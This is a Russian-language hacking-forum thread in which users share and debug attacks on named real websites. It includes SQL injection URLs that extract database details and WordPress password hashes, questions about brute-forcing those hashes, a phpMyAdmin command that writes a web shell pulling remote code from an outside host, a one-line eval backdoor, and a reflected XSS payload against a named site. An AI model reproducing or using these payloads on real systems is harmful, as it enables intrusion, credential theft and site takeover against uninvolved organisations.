да нет, зрячая) Code: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(),version())+using+latin1),4,5,6,7,8/*
Code: http://www.convex.ru/news/news-203.html?=1' Как-нибудь можно дальше скуль раскрутить? Ошибка в подвале страницы.
Можно даже вывод сделать Когда идет упдейт сессии: _http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='
не работают "комментарии" в MySQL нашел сайтик там в поле логина нет проверки на '. ну и выдает при запросе 'union select 1/* Code: Context info for the following error/warning: Error: 1024, Query(r) failed: SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email='' With result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4 in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381 call: DB->queryex("r", "SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''") и так дальше в таком же духе... не --, не # не помогает... что можно попробывать?
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
http://events.wayne.edu/index.php?cat=24'+order+by+2/* при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...
пытаюсь залить шелл через phpmyadmin... командой select '<? @include("http://xxx.com/shell.txt"); ?>' into outfile '/usr/local/www/main/shell.php'; выдает ошибку "Вероятно, размер загружаемого файла слишком велик. Способы обхода данного ограничения описаны в документации " вес шелла 22кб как обойти ?по албански не особо шарю зы версия phpmyadmin 2.11.1.1
Я бы тебе дал код, но это приват. А вообще: PHP: <?=eval($_GET[c])?> вот этого будет достаточно для инклуда, при любых условиях
прочитал таблицы в information_schema и попробовал достать пароль: http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user_login,%20%20user_pass)+using+latin1),4,5,6,7,8+from+wp_users/* но выдает почемуто: Oops Table 'mcli_resources.wp_users' doesn't exist как такое может быть?
мде blog_its.wp_users табла в другой бд select table_schema from information_schema.tables ПОЧИТАЙ ПОДПИСЬ jokester ,КРАСНЫМ ВЫДЕЛЕН0
У всех приставка ta в начале почему то, её просто отбрасывать перед брутом..... Вообще можно сбрутить?
нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен: http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&taskid=8&pv=no
та значения непосредственно в тег <script> вставляеться(и это пассивка а не активка): PHP: http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%27,%27%27);%20}%20alert(%22test%22);%20%3C/script%3E
